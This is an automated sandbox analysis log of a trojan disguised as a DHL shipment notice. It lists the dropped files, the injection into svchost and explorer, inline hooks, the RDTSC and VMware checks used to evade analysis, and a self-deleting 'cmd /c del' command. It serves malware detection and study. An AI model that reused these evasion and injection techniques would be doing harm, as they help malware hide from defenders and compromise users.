          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030FE824
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A830
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0303B090
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030520A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F20A8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F28EC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030FDFCE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F1FF1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030ED616
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03046E30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F2EF7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F2D07
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03020D20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F1D55
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03052581
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F25DD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0303D5E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0303841F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030ED466
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0239EBD9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_02389E50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_02389E4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_02382FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_02382D90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_02382D87
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0302B150 appears 87 times
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: String function: 00D72400 appears 54 times
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: String function: 00D74599 appears 38 times
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041A320 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041A3D0 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041A450 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041A500 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041A31F NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041A3CE NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041A4FB NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030699A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030696D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030696E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030695D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0306A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030699D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0306B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030698A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030698F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0306A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0306A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030697A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0306AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069560 NtWriteFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030695F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0239A320 NtCreateFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0239A3D0 NtReadFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0239A450 NtClose,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0239A500 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0239A31F NtCreateFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0239A3CE NtReadFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0239A4FB NtAllocateVirtualMemory,
          Source: DHL SHIPMENT NOTIFICATION 1146789443.exeVirustotal: Detection: 42%
          Source: DHL SHIPMENT NOTIFICATION 1146789443.exeReversingLabs: Detection: 48%
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeFile read: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeJump to behavior
          Source: DHL SHIPMENT NOTIFICATION 1146789443.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe "C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe"
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeProcess created: C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeProcess created: C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\aeokw.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeProcess created: C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeProcess created: C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\aeokw.exe"
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeCode function: 0_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeFile created: C:\Users\user\AppData\Local\Temp\nsk2670.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@9/4@3/3
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeCode function: 0_2_004021AA CoCreateInstance,
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeCode function: 0_2_00404ABB GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1524:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: DHL SHIPMENT NOTIFICATION 1146789443.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: C:\mvbaz\xgpqcu\xwqn\f27888ddf02c4c6aa9eb1b8f5b3a0302\rlifld\nwoxnqyr\Release\nwoxnqyr.pdb source: DHL SHIPMENT NOTIFICATION 1146789443.exe, 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmp, aeokw.exe, 00000001.00000002.258082115.0000000000D7E000.00000002.00000001.01000000.00000004.sdmp, aeokw.exe, 00000001.00000000.249383523.0000000000D7E000.00000002.00000001.01000000.00000004.sdmp, aeokw.exe, 00000002.00000002.322132231.0000000000D7E000.00000002.00000001.01000000.00000004.sdmp, svchost.exe, 00000011.00000002.515611102.000000000352F000.00000004.10000000.00040000.00000000.sdmp, nsk2671.tmp.0.dr, aeokw.exe.0.dr
          Source: Binary string: wntdll.pdbUGP source: aeokw.exe, 00000001.00000003.255155254.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, aeokw.exe, 00000001.00000003.254132987.000000001ADE0000.00000004.00001000.00020000.00000000.sdmp, aeokw.exe, 00000002.00000003.260122291.00000000012DE000.00000004.00000800.00020000.00000000.sdmp, aeokw.exe, 00000002.00000002.322328355.0000000001470000.00000040.00000800.00020000.00000000.sdmp, aeokw.exe, 00000002.00000002.322514089.000000000158F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.322000917.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.323291458.0000000002E00000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: aeokw.exe, 00000001.00000003.255155254.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, aeokw.exe, 00000001.00000003.254132987.000000001ADE0000.00000004.00001000.00020000.00000000.sdmp, aeokw.exe, 00000002.00000003.260122291.00000000012DE000.00000004.00000800.00020000.00000000.sdmp, aeokw.exe, 00000002.00000002.322328355.0000000001470000.00000040.00000800.00020000.00000000.sdmp, aeokw.exe, 00000002.00000002.322514089.000000000158F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.322000917.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.323291458.0000000002E00000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: svchost.pdb source: aeokw.exe, 00000002.00000002.322286626.00000000011DA000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: aeokw.exe, 00000002.00000002.322286626.00000000011DA000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 1_2_00D72445 push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_00401026 push 5DA8CC51h; iretd
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041E8F5 pushad ; ret
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0040E32E push ebx; ret
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041D475 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041D4C2 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041D4CB push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041D52C push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_00D72445 push ecx; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0307D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0238E32E push ebx; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0239E8F5 pushad ; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0239D475 push eax; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0239D4CB push eax; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0239D4C2 push eax; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0239D52C push eax; ret
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeFile created: C:\Users\user\AppData\Local\Temp\aeokw.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xE6
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 1_2_00D71890 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeRDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 0000000002389904 second address: 000000000238990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 0000000002389B6E second address: 0000000002389B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe TID: 6084Thread sleep time: -50000s >= -30000s
          Source: C:\Windows\SysWOW64\svchost.exe TID: 2312Thread sleep time: -40000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_00409AA0 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeAPI coverage: 4.5 %
          Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 7.7 %
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeCode function: 0_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeCode function: 0_2_004069A4 FindFirstFileW,FindClose,
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeCode function: 0_2_0040290B FindFirstFileW,
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeAPI call chain: ExitProcess graph end node
          Source: explorer.exe, 00000005.00000000.346368110.00000000051AC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.305531432.000000000546A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: =b\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.303730790.00000000051D2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: -94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}71USER
          Source: explorer.exe, 00000005.00000000.270277759.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000005.00000000.290260130.0000000005EAB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.270277759.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.303730790.00000000051D2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000005.00000000.270277759.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
          Source: explorer.exe, 00000005.00000000.268351234.000000000510C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000005.00000000.270277759.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00dRom0cY
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 1_2_00D77A95 IsDebuggerPresent,
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 1_2_00D7558A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 1_2_00D786ED __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_00409AA0 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0302DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0302F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0302DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03053B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03053B7A mov eax, dword ptr fs:[00000030h]
